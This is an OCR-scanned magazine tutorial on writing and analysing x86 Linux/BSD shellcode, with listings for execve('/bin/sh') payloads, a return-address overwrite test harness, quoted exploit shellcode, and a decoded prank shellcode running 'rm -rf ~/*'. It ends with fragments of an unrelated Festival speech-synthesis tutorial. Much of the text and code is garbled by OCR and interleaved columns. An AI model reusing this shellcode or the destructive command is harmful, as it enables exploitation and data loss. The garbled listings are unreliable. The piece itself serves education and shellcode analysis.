0x40018000 

close (3) = 0 

access ("/etc/ lid.so.nohweap", F OK) = -] ENOENT 


(No such file or directory) 


open ( 7 ditb/ Iibeeco.s ))O RDONI:) = 5 
mead (3). i (EE a ONO OO ONO ON ONO SOs 0 EO. 
ONONZOO LN rege SZ be 
TStawos( os, Se Mode —o pPERHG Gta stastze—-12457072, 
Bi) = 0 


old_mmap (NULL, 1253956, PROT READ|PROT EXEC, MAP_ 
PRIVATE, 3, 0) = 0x40027000 

old_mmap(0x4014£000, 32768, PROT READ|PROT WRITE, MAP_ 
PRIVATE |MAP FIXED, 3, 0x127000) = 
0x4014£000 

old_mmap(0x40157000, 8772, PROT READ|PROT WRITE, MAP_ 
PRIVATE |MAP_FIXED|MAP ANONYMOUS, 
-1, 0) = 0x40157000 


close (3) = 0 
munmap (0x40018000, 60420) = 0 
Pex (0) ane 
S 


Listing 9. Verifiyng the shellcode 


S nasm -f exit2.asm 


Sypelogyel bine. sol (epcakie 72 ie) 


exit! 2o% file format elf32-1386 


Disassembly of section .text: 


OCOOGOOG <—Srexe. 


Q: Sardis xO Sebx, sebx 
ee boi mov SOs jail 
A: eel 10) a fie S0x80 


Listing 10. The binary built from the previous exit.c listing 
and opened with gdb 


eS Gdb 7 exit 

GNU gdb 6.1-debian 

Copyright 2004 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General 
Public License, and you are 

welcome to change it and/or distribute copies of it 
under certain conditions. 

Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show 
warranty" for details. 

Ths GDB was contigured as “13s0-linux" =. Using hose 
labtheead db labrary lab; 
[ibe nredd db. soa! 


(gdb) break main 
Breakpoint 1 at 0x804836a 
(gdlo}y euin 


Starting program: /ramdisk/var/tmp/exit 


Breakpoint 1, 0x0804836a in main () 
(gdb) Mdisass exit 


DUMP. Of Vassenblem code ter Mincivon  exrte- 


0x20 0cedVe sexitl: mov 0x4 (Sesp) , sebx 
CA00Cede a3 e. mOvV SOxfc, seax 

Ox 400 cedas fo 1e1 2, ative $0x80 
0x400ceda7 <_exit+11>: mov Sail Seb 
0x400cedac <_exit+16>: int $0x80 


UAUiceddes fevictlc ss mle 


OxA00cedak <sex ie o> cp 
End of assembler dump. 


(gdb) 
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Faculty of Exact and Natural Sciences, / 
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\ 
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by and for developers, sysadmins and users 
interested in the BSD operating systems, \ 


and related free software projects. 


Call tor Papers! ,., 


Call for Papers is open and you can send us 
your proposal to llamcha@bsdday.org 


Complete info of CFP: 
http://www.bsdday.org.ar/consola-en/cfp.txt 
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Registration Open! (ss @bsdday 
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We only have to compile it: 
» GCC —“O-exit Exit.c 


and disassemble it with cap» (http://www.gnu.org/ 
software/gdb/) to make sure it executes. the 
system call and see how it works under the hood: 
see Listing 3. 

The last instruction in mainy) Is the call to the exit 3) 
function. We will now see that exit (3), in turn, calls the 
_exit (2) function which will finally execute the system call, 
including the 0x80 interrupt: see Listing 4. 

Therefore, a shellcode using the libc to indirectly 
execute the exit (2) system call looks like: 


push dword 0 ; status 
call 0x8048284 ; Call the libc exit() function 
(address obtained 
; from the above disassembly) 
add esp, 4 ; Clean up the stack 
*BSD system calls 


In the *BSD family, direct system calls (i.e. through the 
Ox80 interrupt) are slightly different than in Linux, while 
there's no difference in indirect system calls (i.e. using the 
libc functions addresses). 

The numbers of the syscalls are listed in the /usr 
/src/sys/ kern/ syscalls-. master file, which also contains the 
prototypes of the syscall functions. Here are the first lines 
of the file on OpenBSD: see Listing 5. 

The first column contains the system call number, 
the second contains the type of the system call and the 
third the prototype of the function. Unlike Linux, *BSD 
system calls don't use the fastcall convention (i.e. passing 


Listing 11. Spawning a shell 


man 2 execve 
EXECVE (2) Linux Programmer's Manual 


EXECVE (2) 


NAME 


execve - execute program 


SYNOPSIS 
#include <unistd.h> 
int execve(const char *filename, char *const 
acgvy ||, char *conse crnvel|))- 
DESCRIP TEON 
execve() executes the program pointed to by 
filename. filename must be 
either a binary executable, or a script 
Sterurnd with a line or the form 
"#! interpreter [arg]". In the latter case, 
the interpreter must be a 
valid pathname for an executable which is not 
LEseli va SeripE, when will be 
invoked as interpreter [arg] filename. 
argv 1S an array of argument strings passed to 
the new program. envp iS an 


array Of Strings, conventionally of the form 


key=value, which are passed 
as environment to the new program. Both, argv 
and envp must be terminated by 
a null pointer. The argument vector and 
environment can be accessed by 
the called program’ Ss Main fumecrion, when it as 
defined as int main(int argc, 


char eargul |; char “emuwo [jie 


Listing 12. The overall structure of the shellcode 


IME Shore mycakl ; Immediately Jump to the call 


Past Guct Lon 


shellcode: 
pop esi ; Store the address of "/bin/ sh" 
in (hod 
eral 
myeauik: 
call shellcode , Push the address of the next 
byte onto the stack: the next 
db Ly foul: Slav : byte is the beginning of the 


Srune, / loanny Slie 
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arguments in registers), but use the C calling convention 
instead, pushing arguments on the stack. Arguments are 
pushed in reverse order (from right to left), so that they are 
extracted in the correct order by the function. Immediately 
after the system call returns, the stack needs to be cleaned 
up by adding to the stack pointer (ese) a number equal to 
the size, in bytes, of the arguments (to put it simply, you 
have to add the number of arguments multiplied by 4). 

The role of the zax register, instead, remains the same: 
it must contain the syscall number and will eventually 
contain the return value. Therefore, to recap, executing 
a system call requires four steps: 


¢ storing the syscall number in zax; 

¢ pushing (in reverse order) the arguments on the 
stack; 

¢ executing the 0x80 software interrupt; 

¢ cleaning up the stack. 


The previous example for Linux, now becomes on *BSD: 


exit BSD.asm 
mov eax, l ; Syscall number 


push dword 0 ; tval 


push eax ; Push one more dword (see below) 
int 0x80 ; Ox80 interrupt 
add esp, 8 ; Clean up the stack 


As you can see, before executing the software interrupt, 
you need to push one extra dword on the stack (any 
dword will do); for an in-depth discussion on this topic, 
please refer to [FreeBSD]  (htto:/www.int80h.org/ 
bsdasm/#default-calling-convention). 


Writing the shellcode 
The next examples refer to Linux, but can be easily 
adapted to the *BSD world. 
So far, we have seen how to execute simple commands 
using system calls. To obtain our shellcode, now, we only 
have to get the opcodes corresponding to the assembler 
instructions. There are typically three methods to get the 
opcodes: 
¢ writing them manually in hex Intel® 
dcoumentation at hand!), 

¢ writing the assembly code and then extracting the 
opcodes, 

¢ writing the C code and disassebling it. 


(with the 


Listing 13. Resulting assenbly code 


Gets te Mi adem 


[esi + 8], esi . 


mov dword 


mov dword [esi + 12], eax : 


jmp Shore tiny foreman immediately juno to the call instruction 
shellcode: 

pop esi ; Store the address Of "/bin/sh” in ESl 

MOw eax, eax ; Zero out EAX 

mov byte [esa a, all ; Write the null byte at the end of the string 


[ESI+8], 1.e. the memory immediately below the string 
: "/bin/sh", will contain the array pointed to by the 
; second argument of execve(2); therefore we store in 


: [ESIt8| the address of the string... 


~enand “in ESI+tiZ | che NUEL polnker (BAX 16° @)) 
mov el Osco ; Store the number of the syscall (11) in EAX 
lea ebx, [esi] ; Copy the address of the string in EBX 
lea ecx, [esi + 8] ; Second argument to execve (2) 
lea edx, [esi + 12] ; Third argument to execve(2) (NULL pointer) 
ine 0x80 ; Execute the system call 
iyexeL LIL 
Caml shellcode 7 Pus the address ob "/bin/sh onto the stack 
db 7 aan Sine! 
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| don't think this is the right place to talk about 
ModRM and SIB bytes, memory addressing and so 
on. So we won't delve here into writing hand-crafted 
machine code; anyway, you can find all the information 
you want (and probably more) in [Intel] (http:// 
developer.intel.com/design/pentium4/manuals/index__ 
new.htm). So let's take a look now at the other two 
methods. 


In assembler 

The second method is by far the most efficent and 
widespread, though we will see that all methods lead to 
the same results. Our first step will be to use the assembly 
code from the previouS exit.asm example to write 
a shellcode that, using the exit (2) syscall, will make the 
application exit cleanly. To get the opcodes, we will first 
assemble the code with nasn (http://nasm.sourceforge.net/ 
) and then disassemble the freshly built binary with 
objdump: see Listing 6. 

The second column contains the opcodes we need. 
Therefore, we can write our first shellcode and test it with 
a very simple C program borrowea from [Phrack] (http:// 
www. phrack.org/show.php ?p=498&a=14): see Listing 7. 


Though very popular, the above lines may not be that 
straightforward. Anyway, they simply overwrite the return 
address of the maini) function with the address of the 
shellcode, in order to execute the shellcode instructions 
upon exit from main). After the first declaration, the stack 
will look like: 


¢ Return address <Return address (pushed by the cat 
instruction) to store in zre upon exit 

¢ Saved EBP <Saved zsp (to be restored upon exit from 
the function) 

¢ ret <First local variable of the maini) function 


The second instruction increments the address of the ret 
variable by 8 bytes (2 dwords) to obtain the address of 
the return address, i.e. the pointer to the first instruction 
which will be executed upon exit from the main) function. 
Finally, the third instruction overwrites this address with 
the address of the shellcode. At this point, the program 
exits from the main i) function, restores zxse, stores the 
address of the shellcode in zie and executes it. 

To see all this in operation, we just have to compile sc _ 
exit.c and run tt: 


Listing 14. Extracting the opcodes 


Sinveysinl 48 els “ejete (slash citi 
7 Ojcunp =d (get shell} 


Glehe ssitis lal pve Hic Fomlar elrs7—1366 


Disassembly OF Seckon = bext: 


00000000 <shellcode-0x2>: 


Ue eb 18 jmp les <myeali 


O0000002 <shellcode>: 


RS 5e pop SES1 

oe Sic xOr Seax, Seax 

ole 88 46 07 mov S6al,0x7 (%esi) 
Be snore (Oks) mov sesi,0x8 (%es1) 
Ie 89 46 Oc mov seax, Oxc (%eS1) 
e: 60 Ub mov SOxb, tal 

IO 8d le lea (Sesi) , sebx 
ies 8d 4e 08 lea 0x8 (esi) , SECX 
Ise sel Bio Ue lea Oxc (esi) , edx 
io edie) cbge 90x80 


0000001la <mycall>: 


Iai eo'es if ir rt eal 2 <shellcode> 
dl wae das 
Zr 62 69 6e bound ‘%ebp, 0x6e (%ecx) 
Boye Ze das 
24: 73 68 jae 8e 
<mycall+0x74> 
9 


Listing 15. /nserting opcodes them in the C program 


ger shelive 
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\ 
x89\x76\x08\x89\ x46" 
"\x0c\xb0\x0b\x8d\xle\x8d\x4e\x08\ 
xGd\x56\x0e\xcd\ x30" 
UNKES \XeS (Xt \xth (xt \x2t (x67 \ x09. 
MOG\KZE Ks con 
IGN Wnslaligl|() 
int 7S: 
ret = (int *)&ret + 2; 
(*ret) = (int) shellcode; 
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$ gcc -o sc_exit sc _exit.c really been our shellcode to make the program exit, we 
$ ./sc_exit can verify it with strace (http:/www.sourceforge.net/ 
$ projects/strace/): see Listing 8. 


On the last line, you can notice our exit (2) system call. 
Let me guess: your mouth is not really wide open in Unfortunately, looking at the shellcode, we can notice 
amazement! Anyway, if we want to make sure it has alittle problem: it contains a lot of null bytes and, since the 


Listing 16. Disassembling with ndisasm 


S echo —=ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"\ 
> Nes od xe 0B oN KG? ee a x80 kes xed err eb er eo x62 60 \xGe 
> VRC EVR SVR oe xoe" lendisacm -m — 


Q0000000 EBI17 joer shore Oxy 7 Inttval jump Go the CALn 

O0000002 5E pop esi ; Store the address of the string in 
Bol 

00000003 897608 mov [esit+t0x8],esi ; Write the address of the string in 
; Fete 3 

00000006 31C0 xor eax, eax * Zero oul BAX 

OO0O000008 884607 mov [esit0Ox7],al ; Null-terminate the string 

OO0O00000B 89460C mov [esitOxc],eax ; Write the mull pointer to BSl + 12 

OOO00000K BOOB mov al, 0xb ; Number of the execve(2) syscall 

00000010 89F3 mov ebx,esi ; Store the address of the string in 


; EBX (first argument) 


00000012 8D4E08 lea ecx, [esit0x8] ; Second argument (pointer to the 
: array) 
COCCCOLS siDZ xor edx, edx ; Zero out EDX (third argument) 
OOOOOOT] ~“eDso ine 0x50 ; Execute the syscall 
00000019 HS8E4FFFFFF Calin sx2 ; Push the address of the string and 


5 jump to the second 


; i Msic eg Oleleshoia 
QOOQO0001E 2F das 7; "bin; shx" 
OOO0001F 62696E bound ebp, [ecxt+0x6e] 
OUCC0G22> 22 das 
OO00002ZS "1368 qirale: Wyecxol 
OOOCCOZS > S53 pop eax 
9 


Listing 17. The less visible shellcode 


leery! 

char shellcode2[] = 
UNxeD sclO \Vx5e\x3 | \xe9 \xbil\x4di\xbO yxth \x30\ x06 xre xe x46 \xe2 xno” 
UNSeb X05 \Xe8 \Xeb (Xit \xir \xEr xl) \xdo \ xia \xte xt \xd5 \x 9b x91 x09" 
UN XGONXSG \x9e (Ris xe 1 x99 xi \xe2 (xed xed (x9e\ x36 \ xcaxc4 \x9a\ xe il” 
MC 6 VK \xeb \xe9 xc7 xd3 \xde\xnUl\xba \xbs \xaa (xt4) x04 xac \xb4 bb” 
UN XGIO\ X88 \xes (KIS X87 \X5C\xoG\ xe x9d\ x40 \ xO xo0)\ x99 x44) x95 xen” 
UNOS AOR i xa oe) ol 0 VS Oe xe xo od xe i 
lene ccey 

a 
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shellcode is often written into a string buffer, those bytes 
will be treated as string terminators by the application and 
the attack will fail. There are two ways to get around this 
problem: 


¢ writing instructions that don't contain null bytes (not 
always possible), 

¢ writing a self-modifying shellcode (without null bytes) 
which will write the necessary null bytes (e.g. string 
terminators) at run-time. 


We will now apply the first method, while we _ will 
implement the second later. 


First, the first instruction (mov ebx, 0) can be replaced by 
the more common (for performance reasons): 


xor ebx, ebx 


The second instruction, instead, contained all those 
zeroes because we were using a 32 bit register (ax), 
thus making oxo1 become oxo1000000 (bytes are in reverse 
order because Intel® processors are little endian). 
Therefore, we can solve this problem simply using an 8 
bit register (az) instead of a 32 bit register: 


mov al, 1 


Listing 18. Disassembling the shellcode 


OOM OO Oa Sant pop ss 
legecees | 


Listing 19. Decoding the shellcode using python 


decode .py 
#!/usr/bin/env python 


S echo -ne ™\xeb\x10\x5e\x31\xe9\xb1\x4b\xb0\xti\x30\x06\xte\xce[...)/" | \ 
> goby sicysil “=U = 
QO0000000 EB10 IMO Shore .0x1 2 ; Jum to the CALL 
OO0000002 5E pop esi ; Retrieve the address of byte 0x17 
OO00000s > 21¢29 xOr @CX,ECX ; Zero out ECX 
O0000005 B14B mov cl,0x4b ; Setup the loop counter (see 
; imieCenucelom, 0x05) 
OO000007 BOFF mov al, Oxrt ; Setup the XOR mask 
00000009 3006 xor [esi] pal ; XOR byte Ox17 with AL 
OOO0000B FEC8 dec al ; Decrease the XOR mask 
OOO0O0000D 46 inc esi ; Load the address of the next byte 
OOO0O0000E E2F9 koje es) ; Keep XORing until ECX=0 
00000010 EBO5 je shore Oxi? PLUUMp TO Ene trek xORGa  insEruceion 
00000012 ES8EBFFFFFF Calan x2 ; PUSH the address of the next byte and 


; jump to the second instruction 


sc = "\xeb\xl0\x5e\x31\xc9\xbl\x4b\xb0\xff\x30\x06\xte\xc8 \x46\xe2\xto" 
UV xe \ x05 \xe8\ xe \ xP \xth xt \ x1 (\ xdio\xtd\xte (xo xdo  x9b (<9) \ x90" 
UX MOCO 66 (x 9C (xt a xe x90 (xr \ xcZ\ xed \ med x9e\ x66 xca xed x9a xo)" 
UN ROCO\xX9b \xcb\ xc9\xe2 \xd3 \xde\xr0 \xba \xbs \xaa\xr4 \xo4 \xac\xb4 \ xb” 
UNXGO\KSS \xe5 (KIS \xe2 Vxbc\xsd\xcl x9d\x40\ x91 \xc0\ x99 (x44 x95 \xcE” 
WA x95 \xtG\xZ2" \xda\xZ3\xr0\xI \x0E\xb5 \x70\x3c\x32\x/9\xe8\x/3\xtT" 
ON ooie 


print! join ( (chm (ford (x) (Oxti—a efor iy in, enumerate (ce) Oscly21)) |) 


+ + +t + + + 
Sr) eee Bee ee eee 6 en 
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Now our assembly code looks like: To recap, we need to pass it three arguments: 
a pointer to the name of the program to execute (in 
our case a pointer to the string /pin/sh); 
a pointer to an array of strings to pass as arguments 
to the program (the first argument must be argviol, Le. 
the name of the program itself). The last element of 
the array must be a null pointer; 
¢ apointer to an array of strings to pass as environment 
to the program. These strings are usually in the form 
key=value and the last element must be a null pointer. 


xor ebx, ebx . 
mov al, 1 


int 0x80 id 


and the shellcode becomes: see Listing 9, which, as you 
can see, doesn't contain any null bytes! 


InC 
Now let's take a look at the other technique to extract the 
opcodes: writing the program in C and disassembling 
it. Let's consider, for instance, the binary built from 
the previous exit.c listing and open it with gap (http:/ 
www.gnu.org/software/gdb/): see Listing 10. 

As you can see, the function actually 
executes two syscalls: first number 
Oxfc (252), exit group(2), and then 
number 1, The 
group (2) syscall is similar to exit (2) 
but has the purpose to terminate all 
threads in the current thread group. 


Therefore, spawning a shell from a C program looks like: 


get_shell.c 


exit (2) #include <unistd.h> 


Listing 20. Decoding the shellcode using python 
JSRIE(2) eRe 
S$ ./decode.py | 
QO0000000 e8 25 


CODOOOTO 2d. 63 


hexdump -C 
00 00 00° 2% 62°69 Ge Zi 
OZ Cd 20) 7c 7 ac 20) 


ae) 


73638 00) 7s 66 00 Pro af lonbiay/ lalate 


fe Zt Za 20 32 3e -c.rm -rf ~/* 2> 


Anyway, only the second syscall is | 00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 cO 50 8d 5d |/dev/null.]1?P.] 
required by our shellcode. So let's | 00000030 Oe 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 el 31 d2 |.S.].S.].S.&.a10 
extract the opcodes with gab (http:// | 00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 eee Bee S| 
www.gnu.org/software/gdb/): 0000004c 


(gdb) x/4bx exit 


Listing 21. Decoding the shellcode using python. Disassembling 


Ox400ced9c <_exit>: 0x8b Ox5c 
0x24 0x04 S$ ./decode.py | ndisasm -u - 
(gdb) x/7bx exitt11 00000000 825000000 Calta 
Ox400ceda7? <_exitt+ll> OOCU000S SZ2r das 
0xb8 0x01 0x00 0x00 00000006 62696E bound ebp, [ecx+0x6e] 
0x00 Oxcd 0x80 00000009 2F das 
(gdb) O000000A 7368 jnc 0x74 
0000000C 007368 add [ebx+0x68],dh 
Once again, to make the shellcode | 0000000F 002D6300726D add [0x6d720063],ch 
work in real-world applications, we | 00000015 202D7266207E and [0x7e206672],ch 
will need to remove all those null | o000001B 2F das 
bytes! 0000001C 2A20 sub ah, [eax] 
OCOUC0OLE 3238 xor bh, [esi] 
Spawning a shell 00000020 2F das 
Now it's time to write a shellcode | 00000021 6465762F gs jna 0x54 
to do something a little more | 00000025 6z outsb 
useful. For instance, we can write | 00000026 756c jnz 0x94 
a shellcode to spawn a shell (/pin/ | 00000028 6c insb 
sh) and eventually exit cleanly. The | 00000029 005D31 add [ebpt+0x31],bl 


simplest way to spawn a Shell is 


using the execvei2) syscall Let's 


take a look at its usage from its man 
page: see Listing 11. 
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int main() { 


In the above example we passed tO execve (2): 


char *args [2+ 


args 


args 


[O] = 
f= 


execve(args[0], args, NULL); 


a pointer to the string /bin/sn; 
an array of two pointers (the first pointing to the string 
/pbin/sh and the second null); 
a null pointer (we don't need any environment 
variables). 


HOW TO’S 


Now let's build it and see it work: 


». gce =O gét shell ger shell .c 


$ ./get shell 
she=2 -05DS: exvb 
$ 


Ok, we got our shell! Now let's see how to use this 
system call in assembler (since there are only three 
arguments, we can use registers). We immediately have 


to tackle two problems: 


e the first is a well-known problem: we can't insert null 
bytes in the shellcode; but this time we can't help 


Listing 22. The beginning of the shellcode could be re-written this way 


E825000000 


2F62696E2F/36800 


736800 
2D6300 


7T2Z6d202D/ 266207 E2F2ZA20323E2F6465/6Z2F6E/56C6C00 


SD 
[ead 


Listing 23. Examining the called function 


5). decode expspy |) cut —c 45-) |) mdtcacm =i — 
O0000000 5D pop ebp 

CUO COCCI = 3 kCo xOr e€ax,eax 
00000003 50 push eax 
O0000004 8D5D0E lea ebx, [ebpt+0xe] 
OFONGKONONO) ess: push ebx 
00000008 8D5D0B lea ebx, [ebpt+0xb] 
OUOCO COE Sass push ebx 
OO00000C 8D5D08 lea ebx, [ebpt+0x8] 
QOOQ0000F 53 push ebx 
00000010 89EB mov ebx,ebp 
00000012 89E1 mov ecx,esp 
00000014 31D2 xor edx, edx 
00000016 BOOB mov @l,;0xb 
00000018 CD80 int 0x80 
OOO00001A 89C3 mov ebx, eax 
CUO CO ONE Se Seo xOr eax,eax 
OOOOQ01E 40 inc eax 

OOO00001F CD80 imc, 0x3 0 


ead 
db 
db 
db 
db 


Ox2a 


LU Moria) cele 


W Silay! 


W W 
= 


"em =ri ~/* 2>/dev/ null” 


poe ebp 


/ ban sh" 


s Store 


W rm 


and 


; Store 


and 


; Store 


and 


; Store 


EBX 


; Store 


; Retrieve the address of the string 


; “ero oul BAX 


; Push the null pointer onto the stack 


the address of 
=rf ~/* 2>/dev/null” in BBX 


Plush akon the stack 


the address of "-c" in EBX 


PUSh ie On ehe wsrack 


tne address of "sh" ain EBX 


Push at on the stack 
the eddress of 71m) sin" im 


(first 


arg to execve()) 


the Stack pointer to ECX (ESP 


WOmMeS y@,ssli tn) =O. 8, ee Me.) 


; EAX=1 


; Third arg to execve() 

, Number of the execve() syscall 
; Execute the syscall 

; Store Oxb in EBX (exit code=11) 
2 Hie 66) Ole, eveus 


(number of the exit() syscall) 


; Execute the syscall 
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using them: for instance, 
the shellcode must contain 
the string /bin/sn and, in 
C, strings must be null- 
terminated. And we _ will 
even have to pass two 
null pointers among the 
arguments to execve (2)! 

¢ the second problem 
is finding the address 
of the string. Absolute 
memory addressing makes 
development much longer 
and harder, but, above all, 
it makes almost impossible 
to port the shellcode 
among different programs 
and distributions. 


To solve the first problem, 
we will make our shellcode 
able to put the null bytes 
in the right places at run- 
time. To solve the second 


problem, instead, we 
will use relative memory 
addressing. 


The classic method to 
retrieve the address. of 
the shellcode is to begin 
with a caxz instruction. The 
first thing a caz1 instruction 
does is, in fact, pushing the 
address of the next byte 
onto the stack (to allow the 
RET instruction to insert this 
address in exe upon return 
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from the called function); then the execution jumps to the 
address specified by the parameter of the caxz instruction. 
This way we have obtained our starting point: the address You will find here: 
of the first byte after the cazz is the last value on the 
stack and we can easily retrieve it with a por instruction! 
payee ty overall structure of the shellcode will be: materials for articles- 
Let's see what it does: listings, additional 
n ion 1 
first of all, the shellcode jumps to the catz instruction; documentatio , tools 
the cazt pushes onto the stack the address of 
the string /pin/sn (not null-terminated yet); DB is 


he m inter in 
a directive (not an instruction) that simply defines the ost terest g 


(i.e. reserves and initializes) a sequence of bytes; articles to download 
now the execution jumps back to the beginning of the 
shellcode; 
next, the address of the string is popped from the current information 
stack and stored in ESI. From now on, we will be able 
| on the omin 
to refer to memory addresses with reference to the upc iS 
address of the string. issue qT phy 
- J 
Now we can fill the structure of the shellcode with _- 
something useful. Let's see, step by step, what it will unre 
have to do: HPr? 


zero out zax in order to have some null bytes f 
available: | 
terminate the string with a null byte, copying it from 
zax (we will use the az register); 

setup the array scx will have to point to; it will be made 
up of the address of the string and a null pointer. We 
will accomplish this by writing the address of the 
string (stored in zsz) in the first free bytes right below 
the string, followed by the null pointer (once again we 
will use the zeroes in zax); 

store the number of the syscall (OxOb) in eax; 
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¢ store the first argument to execve(2) (i.e. the address 
of the string, saved in zsz) In epx; 

¢ store the address of the array in scx (zs1+8); 

¢ store the address of the null pointer in epx (zs1+12); 

¢ execute the interrupt Ox80. 


This is the resulting assenbly code: see Listing 13. 
Now let's extract the opcodes: see Listing 14. 
insert them in the C program: see Listing 15. 
and test it: 


>. gGce “oO Get shell ger shell..c 
$ ./get shell 

sh-2.05bS exit 

9 


Shellcode analysis 

One last point that deserves attention is the importance of 
disassembling shellcodes, both to learn new techniques 
and to be sure about what they do before executing 
them. 


Trust is good... 

For instance, let's take a look at the shellcode from the 
exploit  (http:/www.securityfocus.com/bid/12268/info/), 
made available by Rafael San Miguel Carrasco, exploiting 
a local buffer overflow vulnerability of the Exim (http:// 
www.exim.org/) MTA (releases 4.40 through 4.43). 


Static char shellcode[]= 

"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\ 
xb0\x0b\x89" 

"\x£3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\ 
x62\x69\x6e" 

WZ ETS x60 xb" 


Let's disassemble it with naisasm; by now, we expect to 
see something familiar: see Listing 16. 


...but control is better 

It's always a good habit to examine a shellcode before 
executing it. For example, on the 28 May 2004, a prankster 
posted  (http://www.seclists.org/lists/fulldisclosure/2004/ 
May/1395.html) on full-disclosure (http:/lists.netsys.com/ 
mailman/lstinfo/full-disclosure) what he asserted was 
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a public exploit for a rsync (http:/Awww.samba.org/rsync/) 
vulnerability. However, the code was weird: after a first, 
well-commented shellcode, there was a second, less 
visible shellcode: see Listing 17. 

On top of that, after a brief look at the main i) of the 
exploit, it was easy to spot that the latter shellcode was 
executed locally: 

(long) funct = &shellcode2; 
fee 
runce()¢ 


Therefore, if we want to know what the shellcode actually 
does, we can do nothing but disassemble it: see Listing 
18. 

As you can see, it's a_ self-modifying shellcode: 
instructions from 0x17 to 0x17 + Ox4B are decoded at run- 
time by XORing them with the value of az (which is initially 
OxFF and then decreases at each loop iteration). Once 
decoded, instructions are executed (jmp short 0x17). SO 
let's try to understand which instructions will actually be 
executed. We can easily decode the shellcode using our 
beloved python (http:/www.python.org/): see Listing 19. 

hexdump Can already give us a first idea: see Listing 20. 

Mmmh... /oin/sh,; sh -c rm =rfi «/* 2>/dev/null sa. This 
doesn't look good... But let's disassemble it to be sure! 
(see Listing 21). 

The first instruction is a cazz, immediately followed by 
the strings displayed by hexdump. The beginning of the 
shellcode could be re-written this way: see Listing 22. 

Let's examine the called function, keeping only the 
opcodes starting at the instruction 0x2a (42): see Listing 
Zo: 

As you can see, it'S an execve(2) syscall with the array 
sh, -c, rm -rf ~/* 2>/dev/null aS the second argument. 
Needless to repeat that you should always analyse 
a shellcode before executing it! 


DANIELE MAZZOCCHIO 


Latest version: http://www. kernel-panic.it/security/shellcode/ 
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How To Convert 


Text to Voice Using Festival and Lame in FreeBSD 


In 2007 | built a web-based IM/ Chat Service which was later 
launched as an iPhone web app. Making a long story short 
| retired the service in 2008 and that was that. 


What you will learn... 
¢ To have basic knowledge on iPhone applications 


based apps so decided to brush the dust off of old Bob 
Chatter code base. After tons of code rewriting and 
little sleep, Bob Chatter version 1.0.0 IM|Chat for WebOS 
devices was released. Release 1.0.1 of Bob Chatter 
includes a service which converts real-time chat instances 
into voice files. After realizing first hand there was little 
documentation regarding FreeBSD and voice technology, 
decided to write a tutorial where others could learn from. 
This tutorial will demonstrate how to install the latest 
version of Festival in FreebBSD and convert text to voice 
files. By reading this tutorial you will also save yourself 
24 hours worth of hard ache, useless web searching 
and loads of curse words... After installing the current 
FreeBSD port festivai-1.96 1 (2007) and as stated above 


| n the summer of 2010 grew a bit bored of building search 


Terminal 
File Edit View Terminal Go Help 


festvox kallpcl6k.tar gz 
festvox rablpcl6k.tar.gz 


speech tools-2.0.95-beta.tar.gz 


ools-2.0.95-beta.tar.qz 


Figure 1. Downloading source packages into same directory 
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What you should know... 
¢ How to install the latest version of Festival in FreebBSD and co- 
nvert text to voice 


getting no where rather quickly, decided to download the 
latest festival-2.0.95-beta (2010) from source. 

This tutorial has been tested on both FreeBSD /7.2- 
RELEASE AND 8.0 RELEASE. 

Festival is a brilliant voice synthesizer developed at the 
University of Edinburgh Centre for Speech Technology 
Research. 


Required Festival Packages 


speech_tools-2.0.95-beta.tar.gz Edinburgh Speech Tools 
Library 


festival-2.0.95-beta.tar.gz Festival Speech Synthesis 


System source 


Lexicons based on various 
dictionaries 


festlex_POSLEX.tar.gz 
festlex_OALD.tar.gz 
festlex_CMU.tar.gz 


festvox_kallpc16k.tar.gz LPC diphone voice database 


files (Required) 


festvox_rablpc16k.tar.gz 
festvox_cmu_us_rms_cg.tar.gz 
festvox_cmu_us_slt_arctic_ 
hts.tar.gz 
festvox_cmu_us_awb_ 
cg.tar.gz 


Additional voice files (Optional) 


Before you begin installing Festival you will need to 


download the required packages. Note: All packages 


must be downloaded to the same directory, not doing 


so will render your installation unusable. In Figure 1, 
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File Edit Yiew Terminal Go Help 


include irixaudio.cec 

gcc -c -fTno-implicit-templates -03 -Wall -DSUPPORT FREEBSD16 
include osZaudio.cc 

gcc -c -fno-implicit-templates -03 -Wall -DSUPPORT FREEBSD16 -I.. 


include macosxaudio.cc 

macosxaudio.cc:227:7: warning: no newline at end of file 

gcc -c -fno-implicit-templates -03 -Wall -DSUPPORT FREEBSD16 -I.. 
include Linux sound.cc 

Linux sound.cc:68: warning: deprecated conversion from string con 
tant to ‘char* 

Linux sound.cc:866: error: redefinition of ‘int freebsd16 support 
d' 

Linux sound.cc:66: error: ‘int freebsd16 supported’ previously de 
ined here 

Linux sound.cc:867: error: redefinition of ‘int Linuxl6 supported 
Linux sound.cc:67: error: ‘int Linuxl16 supported’ previously defi 
ed here 

Linux sound.cc:68: warning: ‘aud sys_ name’ defined but not used 
gmake[1): *** [Linux sound.o) Error 1] 

gmake: *** [audio] Error 2 

homie? 


Figure 2. /nstallation errors using during compiling 


all packages are downloaded to directory vox (usr/nome/ 
dango/vox). Once all files have been downloaded you can 
begin to decompress. 


Festival installation 

After downloading the required packages it is time to 
install. Note: Since the only feature of Festival needed 
for our system was the text2wave to work, | did no testing 
on Festival capabilities with sound cards. Note: You must 
compile speech_too/s before any other source. 


tar Zxvi speech tools=2.0.05-betactar. gz 
cd. speech tools 
./configure 


gmake 


During gmake, errors depicted in screenshot (Figure 2) will 
occur without making the changes addressed in (Figure 3). 
Once speech tools have successfully compiled follow by 
compiling the festival source. 


Term inal 


#ifdef SUPPORT FREEBSD16 
#include <sys/soundcard.h> 
#include <fcntl.h> 
ffint freebsdlbt SUDDOrTLE 
inux16_ supported 
tic char “aud sys name 


fendift /*SUPPORT FREEBSD16 */ 
Zifdef SUPPORT VOXWARE 


#include <sys/ioctl.h=> 

#include <sys/soundcard.h> 
#include <sys/types.h> 

#include <sys/stat.h> 

#include <fcntl.h> 

/fint Linuxl16 supported TRUE: 


reebsadl6o supported 


FS Tatil L nal "aud § ys healt = 
static int stereo only = 0; 


press Escape (*“|) Tor menu 


